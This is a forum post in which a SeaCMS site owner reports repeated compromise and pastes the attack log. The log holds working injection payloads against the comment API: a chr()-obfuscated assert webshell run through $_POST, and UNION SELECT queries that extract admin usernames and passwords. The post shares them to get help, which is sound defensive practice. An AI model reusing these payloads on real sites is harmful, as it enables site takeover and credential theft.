100%
|
阅读:2261回复:6
发现海洋CMS程序老是被挂马
海洋CMS程序老是被sQL注入 全在data文件夹下生成PHP文件 注入的代码如下
113.128.35.216||/comment/api/index.php?gid=1&page=2&rlist[]=*hex/$d=chr(65).chr(83).chr(115).chr(101).chr(114).chr(116);@$d($_POST[_]);?%3E||SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=1 AND id in (*hex/$d=chr(65).chr(83).chr(115).chr(101).chr(114).chr(116);@$d($_POST[_]);?>) AND ischeck=1 ORDER BY id DESC limit 10||unusual character 107.148.224.118||//comment/api/index.php?gid=22&page=9&type=3&rlist[]=1)//**@%60'%60**@//UNION%20SELECT%23%0aname,password,null,null,null,null,null,null,null,null,null%23%0afrom%23%0asea_admin--%20@%60'%60||SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=3 AND id in (1)//**@`\'`**@//UNION SELECT# name,password,null,null,null,null,null,null,null,null,null# from# sea_admin-- @`\'`) AND ischeck=1 ORDER BY id DESC limit 10||comment detect 198.144.159.130||//comment/api/index.php?gid=22&page=9&type=3&rlist[]=1)//**@%60'%60**@//UNION%20SELECT%23%0aname,password,null,null,null,null,null,null,null,null,null%23%0afrom%23%0asea_admin--%20@%60'%60||SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=3 AND id in (1)//**@`\'`**@//UNION SELECT# name,password,null,null,null,null,null,null,null,null,null# from# sea_admin-- @`\'`) AND ischeck=1 ORDER BY id DESC limit 10||comment detect 198.144.159.130||/comment/api/index.php?gid=22&page=9&type=3&rlist[]=1)//**@%60'%60**@//UNION%20SELECT%23%0aname,password,null,null,null,null,null,null,null,null,null%23%0afrom%23%0asea_admin--%20@%60'%60||SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=3 AND id in (1)//**@`\'`**@//UNION SELECT# name,password,null,null,null,null,null,null,null,null,null# from# sea_admin-- @`\'`) AND ischeck=1 ORDER BY id DESC limit 10||comment detect |
|
|
2楼#
发布于:2021-12-21 14:05
|
|
